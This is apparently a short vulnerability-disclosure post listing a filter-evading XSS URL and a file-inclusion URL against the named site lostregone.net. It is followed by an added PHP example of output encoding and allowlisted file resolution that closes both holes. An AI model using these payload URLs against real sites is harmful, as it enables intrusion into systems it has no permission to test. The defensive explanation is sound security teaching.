lostregone.net | XSS, file inclusion

Even with some server-side checks in place, the XSS passed.

http://www.lostregone.net/index.php?words=<video src=1 onerror=alert(String.fromCharCode(112,97,115,115,101,100))>&where=1&go=Vai!&rate=5&id=5062&cal_month=Apr&cal_year=2010&submitted=true&address=Indirizzo+E-mail&action=add

Remote File Inclusion (the script is liga manager online)
http://www.lostregone.net/GSC/gsc.php?action=table&tabtype=0&file=..
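
How the two findings above are closed on the server side, as an added example that is not code from the original post or from the site. The parameter names `words` and `file` come from the URLs above; the blacklist filter, the directory layout, the `.txt` extension and all function names are assumptions.

```php
<?php
// Assumed style of "server-side check": strip <script> tags and quote characters.
function blacklist_filter(string $s): string {
    $s = preg_replace('#</?script[^>]*>#i', '', $s);
    return str_replace(['"', "'"], '', $s);
}

// Encode on output instead of filtering on input: the browser then sees
// text, not markup, whatever tag or event handler was submitted.
function encode_html(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Resolve a user-supplied `file` value inside one directory, or return null.
function resolve_table_file(string $baseDir, string $name): ?string {
    // Allowlist the name shape: no slashes, no scheme, one fixed extension.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // The canonical path must still sit under the base directory (symlinks).
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// The `words` value from the URL in the post.
$words = '<video src=1 onerror=alert(String.fromCharCode(112,97,115,115,101,100))>';
// It contains no <script> tag and no quotes, so the assumed filter changes nothing.
echo 'blacklist left it intact: ', var_export(blacklist_filter($words) === $words, true), PHP_EOL;
echo 'encoded for output:       ', encode_html($words), PHP_EOL;

// Constructed sample directory and `file` values for the inclusion check.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tables_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'league1.txt', "constructed sample\n");
foreach (['league1.txt', '..', '../league1.txt', 'http://example.invalid/x.txt'] as $f) {
    printf("%-30s %s\n", $f, resolve_table_file($dir, $f) === null ? 'rejected' : 'accepted');
}
unlink($dir . DIRECTORY_SEPARATOR . 'league1.txt');
rmdir($dir);
```

The resolved path should only ever be read as data (for example with `file_get_contents`), never passed to `include` or `require`.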